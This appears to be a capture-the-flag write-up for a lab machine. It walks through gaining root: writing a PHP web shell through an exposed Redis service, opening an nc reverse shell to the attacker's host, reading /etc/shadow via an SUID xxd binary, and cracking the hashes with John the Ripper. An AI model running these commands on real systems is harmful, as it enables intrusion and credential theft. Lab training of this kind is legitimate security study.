Nmap scan report for 10.10.165.106 Host is up (0.053s latency). PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works 6379/tcp open redis Redis key-value store 6.0.7 Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> . # Nmap done at Sat Oct 3 08:38:25 2020 -- 1 IP address (1 host up) scanned in 8.74 seconds
So here we can see 2 ports open 80 which is a default Apache Page and 6379 which seems to be reddis and it took me a while to figure it out for some reason but it was Reddis CLI so we can look up some ways to hijack this or utilize this Reddis CLI to exploit and maybe get us a Reverse shell back or use this for further ennumeration.
An article we can use for this is : https://book.hacktricks.xyz/pentesting/6379-pentesting-redis#basic-information
To exploit this Redis CLI to get a reverse shell back :
nc <IP OF TARGET> 6379 config set dbfilename cmdshell.php set test "<?php system($_GET['c']); ?>" save
Then we will have RCE and we can go to the page we just made and use that to get a reverse shell back to us like this :
http://<IP>/cmdshell.php?c=nc -e /bin/bash <Your IP> <Your Port> rlwrap nc -nvlp <Yout Port> # On your local machine
and then after we get our shell back lets ennumerate further to get root privelleges and stuff. So for this we will look at the SUIDs and sudo -l permissions and after looking at this we see a itnresting suid bit called xxd which allows us to read files as root so in this case the best idea for us would be to read /etc/shadow so lets do that.
/usr/bin/xxd /etc/shadow | /usr/bin/xxd -r
and then lets put the last hash into john and crack it and then when we use this password to switch user and sudo -l we can see we can run all the commands as root soo by doing a simple sudo su we will be root and gg Command for John :
john hash -w=/usr/share/wordlists/rockyou.txt
To crack shadow files :
In this case we can also use a johntheripper utility script called unshadow like this :
unshadow [path to passwd] [path to shadow] > shadowfile
and then we can use this shadowfile outputted from the unshadow :
john shadowfile --format=sha512crypt -w=/usr/share/wordlists/rockyou.txt